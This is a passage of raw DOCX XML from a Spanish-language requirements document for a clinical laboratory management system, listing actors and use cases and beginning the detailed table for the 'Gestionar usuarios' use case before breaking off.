    <w:p w:rsidR="00AF05EF" w:rsidRDefault="00AF05EF" w:rsidP="00AF05EF">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc454371304"/>
      <w:r>
        <w:t>Actores</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="00AF05EF" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Administrador del Sistema</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="00AF05EF" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Paciente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="00AF05EF" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Recepcionista</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="00AF05EF" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Auxiliar de Laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="00AF05EF" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Bioquímico</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="00AF05EF" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Médico</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRPr="00AF05EF" w:rsidRDefault="00AF05EF" w:rsidP="00AF05EF">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc454371305"/>
      <w:r>
        <w:t>Casos de Uso</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="00AF05EF" w:rsidP="006319CD">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:ind w:left="1287"/>
      </w:pPr>
      <w:r>
        <w:t>CU1. Gestionar Usuarios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="00AF05EF" w:rsidP="00AF05EF">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:ind w:left="1287"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="006319CD">
        <w:t>U2</w:t>
      </w:r>
      <w:r>
        <w:t>. Gestionar Privilegios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="006319CD" w:rsidP="00AF05EF">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:ind w:left="1287"/>
      </w:pPr>
      <w:r>
        <w:t>CU3</w:t>
      </w:r>
      <w:r w:rsidR="00AF05EF">
        <w:t>. Gestionar Paciente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="006319CD" w:rsidP="006319CD">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:ind w:left="1287"/>
      </w:pPr>
      <w:r>
        <w:t>CU4</w:t>
      </w:r>
      <w:r w:rsidR="00AF05EF">
        <w:t>. Gestionar Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="006319CD" w:rsidP="006319CD">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:ind w:left="1287"/>
      </w:pPr>
      <w:r>
        <w:t>CU5</w:t>
      </w:r>
      <w:r w:rsidR="00AF05EF">
        <w:t>. Gestionar Plantel Medico</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="00AF05EF" w:rsidP="00AF05EF">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:ind w:left="1287"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="006319CD">
        <w:t>U6</w:t>
      </w:r>
      <w:r>
        <w:t>. Gestionar Análisis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="006319CD" w:rsidP="00AF05EF">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:ind w:left="1287"/>
      </w:pPr>
      <w:r>
        <w:t>CU7</w:t>
      </w:r>
      <w:r w:rsidR="00AF05EF">
        <w:t>. Gestionar Parametrización de Análisis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="006319CD" w:rsidP="00AF05EF">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:ind w:left="1287"/>
      </w:pPr>
      <w:r>
        <w:t>CU8</w:t>
      </w:r>
      <w:r w:rsidR="00AF05EF">
        <w:t>. Generar Reportes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="006319CD" w:rsidP="00AF05EF">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:ind w:left="1287"/>
      </w:pPr>
      <w:r>
        <w:t>CU9</w:t>
      </w:r>
      <w:r w:rsidR="00AF05EF">
        <w:t>. Personalizar interfaz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006319CD" w:rsidRDefault="006319CD" w:rsidP="006319CD">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:ind w:left="1287"/>
      </w:pPr>
      <w:r>
        <w:t>CU10</w:t>
      </w:r>
      <w:r w:rsidR="00AF05EF">
        <w:t>. Recepción de Pacientes</w:t>
      </w:r>
      <w:r w:rsidRPr="006319CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006319CD" w:rsidRDefault="006319CD" w:rsidP="00491F38">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:ind w:left="1287"/>
      </w:pPr>
      <w:r>
        <w:t>CU11. Análisis Pacientes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="00AF05EF" w:rsidP="00AF05EF">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:ind w:left="1287"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C1EFC" w:rsidRDefault="007C1EFC" w:rsidP="00AF05EF"/>
    <w:p w:rsidR="00F55733" w:rsidRDefault="00F55733" w:rsidP="00AF05EF"/>
    <w:p w:rsidR="00F55733" w:rsidRDefault="00F55733" w:rsidP="00AF05EF"/>
    <w:p w:rsidR="00F55733" w:rsidRDefault="00F55733" w:rsidP="00AF05EF"/>
    <w:p w:rsidR="000D0C41" w:rsidRDefault="000D0C41" w:rsidP="00AF05EF"/>
    <w:p w:rsidR="00F55733" w:rsidRDefault="00F55733" w:rsidP="00AF05EF"/>
    <w:p w:rsidR="00D11E70" w:rsidRDefault="00AF05EF" w:rsidP="007C1EFC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc454371306"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Detalle de Casos de Uso</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="007C1EFC" w:rsidRPr="00353350" w:rsidRDefault="007C1EFC" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc404803458"/>
      <w:bookmarkStart w:id="43" w:name="_Toc454371307"/>
      <w:r>
        <w:t>Gestionar u</w:t>
      </w:r>
      <w:r w:rsidRPr="00D85200">
        <w:t>suarios</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="007C1EFC" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
      <w:r w:rsidRPr="00353350">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D50CD34" wp14:editId="0FDD0BAD">
            <wp:extent cx="5637202" cy="242422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3055" t="10238" r="3598" b="3755"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5662739" cy="2435205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula4-nfasis1"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1732"/>
        <w:gridCol w:w="7096"/>
      </w:tblGrid>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidTr="007E1287">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787" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00EC6643" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC6643">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Caso de uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4213" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00EC6643" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC6643">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">CU1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Gestionar u</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC6643">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>suarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE"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7" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0" w:firstLine="19"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Propósito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4213" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Administrar toda la información necesaria correspondiente a los usuarios del sistema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="787" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4213" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>El administrador del sistema puede reestablecer la contraseña,  la pregunta de seguridad, modificar el email y  dar de baja a cualquier usuario previamente registrado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidTr="007E1287">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787" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Actores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4213" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0" w:firstLine="34"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Administrador del sistema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="787" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Actor Iniciador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4213" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Administrador del sistema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE"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7" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pre-condición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4213" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0" w:firstLine="34"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CU14. Gestionar plantel administrativo, CU7. Gestionar paciente, CU13. Gestionar plantel médico</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="367"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="787" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Proceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4213" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="00954840">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:hanging="559"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Escribir CI o nombre y apellido del usuario.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="00954840">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="870" w:hanging="425"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Seleccionar un usuario</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="00954840">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:hanging="586"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Seleccionar el usuario.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="00954840">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="842" w:hanging="425"/>
